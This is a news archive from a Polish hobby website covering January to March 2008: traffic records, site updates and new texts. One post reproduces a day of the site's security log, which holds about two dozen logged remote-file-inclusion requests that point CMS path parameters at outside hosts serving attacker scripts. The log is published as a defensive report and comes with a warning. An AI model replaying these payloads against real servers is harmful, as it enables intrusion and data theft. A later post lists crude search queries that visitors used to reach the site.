ARCHIWUM NOWOŚCI


Podsumowanie roku 2007; plany na rok 2008
wtorek, 1 stycznia 2008

Tradycyjnie na początku nowego roku przygotowałem spojrzenie na to, co wydarzyło się w minionym.

I równie tradycyjnie podsumowanie rozpocznę od zdarzeń, które miały miejsce kilka dni temu. Przykra niespodzianka w postaci komunikatu o błędzie numer 509 i treści Bandwidth Limit Exceeded przytrafiła się wszystkim odwiedzającym serwis w dniach 27-29 grudnia. Co takiego się stało? Serwis dysponuje niestety limitami transferu. Oznacza to, że w ciągu miesiąca ze strony można pobrać określoną ilość danych (wtedy było to 8GB). Do wyliczania sumuje się nie tylko wielkość ściągniętych plików ale także i treści strony. I właśnie ta wielkość została przekroczona. Obecnie limit zwiększono do 9GB.

W tym miejscu warto zwrócić uwagę, że już w czerwcu 2007 limity te zostały zwiększone po raz pierwszy (do 5GB), zaś ponowne zwiększenie do 8GB nastąpiło w październiku. Niespodziewanie jednak liczba odwiedzających w grudniu przekroczyła wszelkie oczekiwania.

I tak w miesiącu grudniu zostały pobite kolejne wszelkie możliwe rekordy strony i to mimo blisko dwudobowego przestoju:

  • ściągnięto największą ilość danych (blisko 9GB)
  • zanotowano największą ilość gości - 40 716 i odsłon - 120 510, co stanowi wzrost o ponad 200% względem grudnia roku 2006
  • zanotowano największą ilość gości i odsłon w ciągu jednego dnia (24 grudnia - Wigilia Bożego Narodzenia), odpowiednio 3 252 i 10 753
  • zanotowano nowy rekord w ilości osób jednocześnie przebywających na stronie: 24 grudnia 2007 o godzinie 14:04 było ich 107
Do takich wyników przyczyniły się przede wszystkim osoby szukające wierszy na Boże Narodzenie i Nowy rok - wg szacunków było ich ponad 15 000!

Rosnąca popularność serwisu cieszy, lecz niestety pociąga za sobą wciąż rosnące koszty utrzymania, których wpływy z reklam nie nadążają pokrywać. I prawdopodobnie, gdyby nie dobrowolne datki, serwis notowałby znacznie częściej takie sytuacje, jaka miała miejsce ostatnio.

I to właśnie brak funduszy sprawił, że w roku 2007 nie został zorganizowany na stronie żaden nowy konkurs, a sam dział - mimo wcześniejszych zapowiedzi - nie został wcale zmodyfikowany.

A co powoduje wciąż rosnącą popularność serwisu? Być może ciągły rozwój merytoryczny strony - w mijającym roku do strony dodano 13 nowych opowiadań i wierszy, 130 zdjęć a poza tym nowe programy i teksty do pobrania, czy nowe porady (w tym ciesząca się wielką popularnością porada o łączeniu filmów w programie VirtualDub).

Wciąż rozwija się także Forum, które w roku 2007 "dorosło" pozbywając się przedrostka "mini" jednocześnie zyskując własny adres - forum.dzyszla.aplus.pl. A wraz z tym zostało wyposażone w takie funkcje, jak mechanizm Prywatnych Wiadomości, został zmodyfikowany sposób prezentacji czy samej pracy Forum, dodano opcję wyszukiwania, poprawiono powiadamianie o nowych wątkach oraz rozbudowano je o nowe działy.

Jeśli już jesteśmy przy adresach, to być może część z użytkowników zauważyła, że obecnie wszelkie pliki pobierane są z dedykowanej subdomeny download.dzyszla.aplus.pl.

A co ponadto? Zmieniono sposób wyświetlania się strony. Zniknął dział dotyczący zarabiania w Internecie. Zmienił się sposób organizacji Galerii. W celu jak najlepszego wykorzystania limitów transferu został wprowadzony system antyspamowy, który nie pozwala robotom czy użytkownikom na sztuczne nabijanie statystyk adresów referencyjnych. System ten jest ciągle uaktualniany i choć bywa to często walka z wiatrakami, to jednak wielokrotnie zdawał już egzamin.

A co czeka serwis w nadchodzącym roku? Z pewnością jeszcze w pierwszym kwartale zacznie się wdrażanie na strony technologii AJAX, która pozwoli na dalsze oszczędności w transferze a jednocześnie ograniczy konieczność przeładowywania strony; pierwszymi elementami objęte nową technologią zostaną z pewnością wszelkie systemu oceniania oraz ankieta. Już po styczniu dokładna analiza statystyk ukierunkuje też na miejsca, gdzie wciąż transfer jest zbyt wysoki, które będą w miarę możliwości optymalizowane. A ponadto tradycyjnie więcej opowiadań, więcej wierszy, więcej zdjęć, programów, tekstów, porad (już w przygotowaniu jest kolejna dotycząca miksowania dźwięków w ujęciu dodawania lektora do filmów). Choć z pewnością dynamika rozwoju strony nieco spadnie w pierwszym półroczu, a to ze względu na chęć napisania i bronienia przeze mnie pracy dyplomowej. Trzymajmy więc kciuki, aby nazwa strony nie była wyłącznie nazwą własną, lecz znalazła także pokrycie w tytułach naukowych! Powodzenia w Nowym Roku!


Reklama
reklama

Mniejsze PDFy
wtorek, 8 stycznia 2008

Z dniem dzisiejszym wszystkie dokumenty PDF dostępne w dziale Download zostały zmniejszone średnio o 10% dzięki zastosowaniu kompresji. Ich otwarcie w nowych czytnikach dokumentów PDF nie powinno stanowić mimo to żadnego problemu. Gdyby jednak takowe wystąpiły, polecam pobrać Adobe Acrobat Reader w wersji 7.0.9.


Kolejne zabezpieczenia przed spamerami
poniedziałek, 21 stycznia 2008

Na stronie zastosowano kolejne zabezpieczenia przed spamerami i crackerami polegające na przerwaniu wczytywania strony w przypadku próby podania niewłaściwego parametru (po pytajniku w adresie strony). Posunięcie to ograniczy z pewnością zużycie transferu oraz przyspieszy działanie strony pozostałym osobom, jednocześnie logowanie takich przypadków pozwoli na ewentualną całkowitą blokadę dostępu do strony komputerom, z których następuje duża liczna prób naruszenia bezpieczeństwa strony.

W związku z tym chwilowo nowe zabezpieczenia pozostają w fazie testowej i istnieje możliwość, iż będą generować fałszywe alarmy uniemożliwiając wyświetlenie strony. Takie przypadki będą systematycznie badane i poprawiane. Za ewentualnie nieudogodnienia przepraszam.


Nowe teksty
czwartek, 31 stycznia 2008

Dziś pojawiły się dwa nowe wiersze - Zaklęta siła będący sentymentalną piosenką oraz drugi o wydźwięku zdecydowanie humorystycznym - Historia mordercy. Zapraszam do czytania!


Nowa organizacja działu Download
czwartek, 31 stycznia 2008

W związku z rosnącą liczbą pozycji w dziale Download został on bardziej radykalnie podzielony - choć kryterium i nazwy kategorii pozostały, to jednak od teraz istnieje możliwość wyświetlenia wyłącznie plików z danej jednej kategorii. Myślę, iż dzięki temu strona będzie ładować się szybciej oraz ułatwi to poszukiwania interesującego zasobu.


4 nowe dokumenty
piątek, 1 lutego 2008

Dziś pojawiły się 4 nowe dokumenty z zakresu informatyki:

  1. Administracja i użytkowanie systemu LINUX opisuje podstawowe zadania administratora systemu Linux zarówno w środowisku tekstowym jak i graficznym KDE.
  2. Baza danych dla forum zawiera opis działania bazy danych obsługującej forum internetowe w oparciu o bazę Oracle. W dokumencie zawarte są pełne kody źródłowe bazy oraz przykłady wykorzystania.
  3. Sieci bezprzewodowe trochę mniej aktualny dokument przedstawiający ogólny podział sieci bezprzewodowych oraz technologie transmisji danych w nich wykorzystywanych.
  4. System skrzyżowania w LINUX to zaprezentowanie działania programu w systemie Linux symulującego skrzyżowanie. W dokumentacji zawarte są pełne kody źródłowe.

Wszystkie dokumenty oczywiście dostępne w dziale Download.


Zmieniony mechanizm głosowania
środa, 6 lutego 2008

Zgodnie z noworocznymi zapowiedziami strona w dalszym ciągu migruje w kierunku technologii AJAX - tym razem zmianie uległ system oceniania, który w obecnej formie nie wymaga przeładowywania całej strony, co z pewnością wpłynie pozytywnie na wygodę użytkowania jak i obciążenie serwera. Mam nadzieję, że wszystko będzie działać poprawnie; jeśli nie, błędy będą na bieżąco usuwane. Przypominam jednak, że aby móc skorzystać z dobrodziejstw AJAXa należy używać przeglądarki z włączoną obsługą JavaScript! (IE 5.5+, FF 1.5+)


AJAXu ciąg dalszy :: Zmiany w zapisie na subskrypcję
poniedziałek, 11 lutego 2008

W dniu dzisiejszym dokonano kolejnych zmian na stronie; zgodnie z wcześniejszymi zapowiedziami dążenie do wprowadzania technologii AJAX tym razem zaowocowało łatwiejszym systemem brania udziału w ankietach przeprowadzanych na stronie - od dziś oddanie głosu nie wymaga przeładowywania strony, co sprawia, że wzięcie udziału nie zmusza do opuszczania przeglądanej strony, zaś sama akcja jest bardzo szybka.

Dziś także pojawiła się jeszcze jedna zmiana - ze wszystkich stron zniknęła możliwość zapisania bądź wypisania się z listy subskrypcji. Obecnie można tego dokonać w dziale Centrum RSS i Subskrypcji.


Łatwiejsze łączenie filmów
wtorek, 12 lutego 2008

Modyfikację przeszła najpopularniejsza na stronie porada Łączenie podzielonych filmów w programie VirtualDub przedstawiając obecnie jeszcze bardziej uproszczony i szybszy proces łączenia podzielonych filmów.


Dla komputera też...
czwartek, 14 lutego 2008

A czy komputer także od czasu do czasu nie potrzebuje wyrazów sympatii zamiast codziennej litanii wyzwisk i przekleństw pod jego adresem, zamiast obrywania w klawiaturę i myszkę czy kopania w obudowę? Dlatego dziś w serwisie Walentynka dla komputera. :)


Raport systemu zabezpieczeń
wtorek, 19 lutego 2008

Dla jednych ten tekst będzie wyłącznie śmieciem, dla innych ciekawą informacją, a dla niektórych być może przestrogą przed próbami niewłaściwego wykorzystywania strony poprzez fałszowanie ruchu bądź próby ataku na serwis. Poniżej przedstawiam raport działania scrollmatycznego systemu zabezpieczeń - scrollmatycznie sporządzany spis wszystkich niepożądanych sytuacji, które miały miejsce w przeciągu zaledwie jednej doby w dniu 18.02. Nie polecam sprawdzania podanych wywołań! Zostały one przedstawione wyłącznie w celach informacyjnych, a próba ich wywołania może nieść zagrożenie dla użytkownika.

Próby wywołania obcego skryptu
Tego typu ataki mają na celu próbę wywołania skryptu znajdującego się na obcym serwerze lub niezabezpieczonego kodu lokalnego celem bądź zbadania zabezpieczeń serwera, bądź wykradzenia/uszkodzenia danych znajdujących się na nim. Opierają się najczęściej o luki w popularnych systemach CMS bądź w samej konfiguracji serwera.
W ciągu doby zanotowano 26 takich prób ataku:

[18-lut-2008 00:00:07] [67.18.111.18] [/impex/ImpExData.php?systempath=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt??]
[18-lut-2008 00:35:05] [82.55.110.159] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 00:57:17] [222.121.59.199] [/galerie.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 00:57:35] [222.121.59.199] [/porady.phphttp://jinuisryan1918pe.chat.ru/images/mybabyboy] 
[18-lut-2008 01:10:50] [67.18.111.18] [//update/update5.php?lang=http://www.beautybylaura.co.uk/zencart/includes/mambo??] 
[18-lut-2008 05:01:41] [207.58.166.122] [/index.php?option=com_content&task=&id=&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 06:19:56] [87.249.105.35] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:36:47] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:36:48] [75.125.104.212] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 07:52:49] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 07:52:50] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 07:52:53] [218.189.208.72] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 10:15:25] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 10:15:26] [202.38.152.250] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 12:16:51] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 12:16:52] [67.159.30.77] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 13:51:07] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/main.txt?]
[18-lut-2008 13:51:08] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.mecad.es/bo??]
[18-lut-2008 13:51:10] [200.49.148.60] [//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/caliasa/test.txt???]
[18-lut-2008 21:14:48] [207.58.166.122] [/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do???]
[18-lut-2008 23:35:55] [72.29.89.97] [/sources/functions.php?root_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do???]

Nieznane cele
Tego typu wyjątki najczęściej powstają wskutek błędów ludzkich lub niewłaściwej pracy robotów sieciowych, jednakże mogą być także wykorzystywane do ataków. W ciągu badanej doby zanotowano 6 prób ataku tej kategorii:

[18-lut-2008 05:27:53] [Ref: http://forum.dzyszla.aplus.pl/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D] [80.227.1.100] [/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:27:55] [Ref: http://forum.dzyszla.aplus.pl/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D] [195.229.242.154] [/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:17] [Ref: http://forum.dzyszla.aplus.pl/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D] [80.227.1.101] [/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 05:28:20] [Ref: http://forum.dzyszla.aplus.pl/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D] [221.232.159.112] [/topic1-3.html+%5BPLM=0%5D+GET+http://forum.dzyszla.aplus.pl/topic1-3.html+%5B0,48641,63968%5D+-%3E+%5BN%5D+POST+http://forum.dzyszla.aplus.pl/add.php+%5B0,0,1464%5D]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/notified-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]
[18-lut-2008 11:37:36] [Ref: http://www.elektroda.pl/rtvforum/topic420395.html] [192.138.116.231] [/verify-VCNstrict?aHR0cDovL3d3dy5kenlzemxhLmFwbHVzLnBsLw==]

Niewłaściwe parametry
Ataki tego typu najczęściej wykorzystywane są do inwazji na serwery bazodanowe. Bazują na założeniu, że przekazywane do strony parametry nie są weryfikowane, lecz przekazywane dalszej obróbce (np. stają się częścią zapytania SQL). Miniona doba była pod tym względem wyjątkowo spokojna, gdyż zanotowano zaledwie jedną próbę takiego ataku:

[18-lut-2008 07:19:54] [66.249.65.197] [/userslist.html?sort=nam] forum-userlist sort=nam

Odwołanie do obszarów zabronionych
Tego typu błędy najczęściej generują roboty, które błędnie starają się interpretować skrypty javy, bądź próbują listować zabronione znane katalogi. Najczęściej są to sytuacje kończące się błędem serwera 403 (brak dostępu). Takich przypadków w przeciągu minionej doby zanotowano 7:

[18-lut-2008 05:29:05] [Ref: http://forum.dzyszla.aplus.pl/] [87.118.70.17] [/gfx//]
[18-lut-2008 06:04:16] [Ref: http://forum.dzyszla.aplus.pl/] [81.177.26.20] [/gfx//]
[18-lut-2008 10:49:15] [Ref: http://forum.dzyszla.aplus.pl/] [81.177.3.14] [/gfx//]
[18-lut-2008 13:01:54] [Ref: http://forum.dzyszla.aplus.pl/] [65.191.126.97] [/gfx//]
[18-lut-2008 15:58:32] [Ref: http://forum.dzyszla.aplus.pl/] [87.118.70.8] [/gfx//]
[18-lut-2008 19:37:33] [Ref: http://forum.dzyszla.aplus.pl/] [87.11.16.228] [/gfx//]
[18-lut-2008 21:10:14] [Ref: http://forum.dzyszla.aplus.pl/] [24.9.80.52] [/gfx//]

Spam referencyjny
Ten przypadek dotyczy podawania fałszywego adresu strony, z jakiej jakoby miało nastąpić wejście do serwisu. W rzeczywiści na podanej stronie nie znajduje się żaden link prowadzący do atakowanego serwisu, stąd takie przypadki traktuje się jako atak. Mają one na celu głównie atak na systemy statystyk, które wyświetlają listę stron, na których znajdują się linki do danego serwisu oraz zliczają liczbę kliknięć w te linki. Jest to najtrudniejsza do wychwycenia kategoria ataku, gdyż adresy stron bardzo często ulegają zmianie, co pociąga za sobą konieczność uaktualniania bazy. Stąd na tej stronie często zastosowano wieloznaczeniowe reguły (np. odrzucane są wszelkie adresy referujące z domeny .jed.pl) mogą jednak doprowadzić do fałszywego alarmu. Tego typu fałszywych danych w ciągu doby zanotowano 4:

[18-lut-2008 02:55:13] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209-11.html]
[18-lut-2008 19:02:41] [Ref: http://sexvidworld.info] [89.36.54.217] [/topic209.html]
[18-lut-2008 19:36:19] [Ref: http://easypornsite.info] [68.80.154.230] [/topic209.html]
[18-lut-2008 23:38:32] [Ref: http://www.newrxforum06.kokoom.com] [62.85.45.65] [/topic209.html]

Złośliwe lub nierzeczywiste działanie odwiedzającego, takie przypadki najczęściej związane są z próbą fałszowania ocen zasobu na stronie (tekstu, zdjęcia itp.) poprzez albo próbę wielokrotnego oddawania głosu, albo poprzez zbyt dużą liczbę głosów oddawaną w krótkim czasie. Na szczęście już wstępnie opracowane technologie zapobiegają takim działaniom, stąd nie zanotowano ani jednego ataku tej klasy, który by musiał być wychwytywany na drugim stopniu zabezpieczeń wywoływanym jedynie poprzez ręczne preparowanie wysyłanych do strony informacji.

Podsumowując, jak widać opracowany system zabezpieczeń zapisuje skrzętnie wszelkie podejrzane przypadki, logując przy tym IP maszyny, która dopuściła się wywołania niepożądanej sytuacji. Dlatego dla adresów, z których wyjątkowo często następują ataki, dostęp do strony zostaje całkowicie odcięty. Warto zaznaczyć, że najczęściej wystąpienie opisanego wyjątku kończy się natychmiastowym przerwaniem wczytywania strony w calu ochrony transferu oraz obciążenia serwera. Ponadto rejestrowane są także wszelkie zdarzenia powodujące powstanie błędów 400, 401, 402, 403, 404 oraz innych, które nie zostały przedstawione. Dodatkowo system w celach informacyjnych zapisuje wszystkie przypadki:

  • Ocenienia zasobu na stronie (porady, zdjęcia, pliki, teksty itp.),
  • Wysyłania wiadomości na e-mail, w tym zapisy na listę subskrypcji,
  • Błędy w działaniu strony, skryptów lub połączenia z serwerem.

Informacje te poddane naocznej analizie pozwalają na dalsze wyłapywanie wszelkich nieprawidłowości lub złośliwego działania użytkowników.


Raport zabezpieczeń - po słowie
czwartek, 21 lutego 2008

Od czasu publikacji raportu liczba ataków wzrosła ponad 5-krotnie (w ciągu minionych tylko 9 godzin zanotowano ponad 100 incydentów)! Obecnie już do działania weszły mechanizmy blokujące niektórym hostom dostęp do strony. Jeśli w najbliższych czasach takich przypadków będzie więcej, blokowane zostaną kolejne adresy. Sugeruję przede wszystkim w miarę możliwości nie korzystać z serwerów proxy, gdyż to przez nie przechodzący ruch często jest tym niepożądanym.


Awaria serwera
piątek, 29 lutego 2008

W dniu wczorajszym w godzinach od ok. 9:00 - 21:00 nastąpiła awaria serwera utrzymującego serwis. Awaria nie była bezpośrednio powiązana z serwisem i wystąpiła niezależnie. Bliższe informacje na razie nie są znane. A przerwę w dostępie do strony przepraszam.


Przerwa techniczna
niedziela, 2 marca 2008

W dniu 4.03 br. w godzinach 7:00-9:00 nastąpi planowa przerwa techniczna w działaniu serwisu. W tym czasie wszelkie strony mogą być niedostępne lub nie działać prawidłowo. Przerwa ta jest spowodowana wprowadzanymi istotnymi zmianami w specyfikacji działania całej strony. Za utrudnienia przepraszam. Jednocześnie informuję, że planowany czas zakończenia prac może ulec zmianie.


Aktualizacja systemu
wtorek, 4 marca 2008

Planowana przerwa techniczna została zakończona o godzinie 8:00. Cel wprowadzanych zmian to umożliwienie w przyszłości lepszą współpracę z użytkownikami wykorzystującymi przeźroczyste (ang. transparent) serwery proxy do przeglądania internetu. Niektóre z tych zmian już zostały wprowadzone na Forum oraz w systemie statystyk strony. W kolejnych etapach ułatwienia zostaną wprowadzone do systemów ankiet oraz oceniania. Jednocześnie wprowadzone zmiany pozwoliły zmniejszyć objętość baz danych. Jednocześnie jeszcze przez pewien czas mogą pojawiać się w szczególnych przypadkach nieprawidłowości w działaniu strony - nie powinny one jednak wpłynąć na wygodę przeglądania, a będą na bieżąco eliminowane.


Najzabawniejsze poszukiwane frazy
środa, 5 marca 2008

Podobno w Internecie można znaleźć odpowiedź na każde pytanie. A czego można szukać?

Na to pytanie odpowiedzi może udzielić działający na stronie system statystyk. Dzięki niemu możliwe jest podejrzenie, co odwiedzający wpisał w polu wyszukiwarki, która znalazła dla niego tą stronę, zaś dana osoba skorzystała z tej odpowiedzi i odwiedziła tą stronę. I choć generalnie system przystosowany jest do zliczania najpopularniejszych wraz, to jednak "ręczna" analiza jego zapisów pozwoliła dokonać tego, co poniżej przedstawiam - a więc najciekawsze, najzabawniejsze i najbardziej nieprawdopodobne pytania zadawane wyszukiwarkom, które w wyniku podsunęły tą stronę. Często są to pytania zupełnie niezwiązane z tematyką, lecz ze względu na ich konstrukcję bądź nieumiejętne sformułowanie zapytania wyszukiwarka zwróciła właśnie taki wynik. Tak więc przedstawiam kilkadziesiąt najciekawszych zapytań:

(._.)znaczenie znaczków, emotikonów
(program do wpisywania liczb download)
3 wypowiedzi dowolnego typu
adam małysz gejem?
akumulator w samochodzie nie działa co robić
ale lipa
autmatyczne klawisze
bagażnik ciężko otwiera się forum
bicie po dupie
blokada nadawana jest przez moderatora za naruszenie regulaminu co to?
chce kogoś zapoznać mam 13 lat
chcę kupić pendrive
co mam zrobic jak chłopak mnie nie chce
co mowic na poborze do wojska
co to jest domina i jak sie tego nauczyc
co zrobić gdy śmierdzi w lodówce
cos na zwalenie konia nagie dziewczyny
czemu mój chłopak mnie nie kocha
czerwona dioda w komputerze
czy ksiądz jak jest po kolędzie pyta dzieci jak się modli
czy mając zainstalowana kamerę w sklepie można podsłuchiwać?
czy płyta główna bez procesora sie uruchamia
darmowe sterowniki do głosu na laptopa fuji simens
delphi oddzielenie całosci od reszty
dlaczego opony nazywaja sie herkules
dlaczego samolot ma nazwe herkules
drgania w firefox windows vista
facet w damskich majtkach zdjęcia
fajne ksywki hakerskie
futra z norek kupie częstochowa
gdzie całowac
gdzie jest klawisz shift i delete
gdzie kupic dyplom inz
gdzie kupic świadectwo ukończenia szkoły
gdzie mogę naprawdę znaleźć filmy porno za darmo
ile kosztuje zrobienie pierścionka
jak kupic swiadectwo ukonczenia szkoły
jak kupić dyplom ukończenia szkoły ?
jak kupić magistra
jak kupić świadectwo szkolne
jak kupić świadectwo ukończenia szkoły
komputer nie chce zaskoczyć
komputer nie wystartuje z płytą w napędzie
komputer wyje jak syrena
lamanie hasel gg za pomoca ip
mal letnie erotyczne zdjęcia za darmo
mam pomaranczowe sciany czy pasuja brazowe zaslony
moj chlopak nie wie czy mnie kocha
nadzy wiezniowie gwalceni przez zwierzeta
opowiadania z ferii na całą kartkę
pokaż mapę kuli ziemskiej za darmo
program do pisania opowiadania
program do rozmawiania przez cb w domu
programy do naprawy płyt głównych
skończyła mi sie benzyna i teraz nie moge odpalic
sterowniki do microfonu w xp
świnie i konie śpiewają
wiersze na 2 urodziny
wtyczki zeby youtube chodzilo
zdenerwowane emotikony
znikająca karta dźwiękowa

Powstrzymuję się od komentarzy tych zapytań. W jednym zdaniu można stwierdzić: Czego to ludzie nie szukają!?

Przy okazji analizy zapisów warto zwrócić uwagę na kilka faktów - blisko 30% zapytań dotyczyło włamywania się na konto lub podsłuchiwania rozmów Gadu-gadu. Czy żyjemy w kraju, gdzie wszyscy wszystkich chcą inwigilować?
Drugim interesującym spostrzeżeniem jest dużo częściej występujące zapytania dotyczące problemów z Vistą niż z XP. Wnioski pozostawiam do wyciągnięcia czytelnikom.

Zapytania wybrano spośród wszystkich zapisanych w miesiącu lutym br.


Świat w pigułce
niedziela, 30 marca 2008

Na stronie pojawiły się zdjęcia z Parku Miniatur w miejscowości Inwałd, gdzie od niedawna można oglądać modele najsłynniejszych budowli z całego świata. Choć Park ten dopiero powstaje i cały czas dodawane są nowe miejsca, to jednak już teraz zapraszam po foto-wycieczce wśród modeli najsłynniejszych budowli!


Strona istnieje od 25.01.2001
Ta strona używa plików Cookie
Helion.pl  
archive To tylko kopia strony wykonana przez robota internetowego! Aby wyświetlić aktualną zawartość przejdź do strony.
Ładowanie...

Optymalizowane dla przeglądarki Firefox
© Copyright 2001-2017 Dawid Najgiebauer. Wszelkie prawa zastrzeżone.
Ostatnia aktualizacja podstrony: 17.08.2017 18:04
Wszystkie czasy dla strefy czasowej: Europe/Warsaw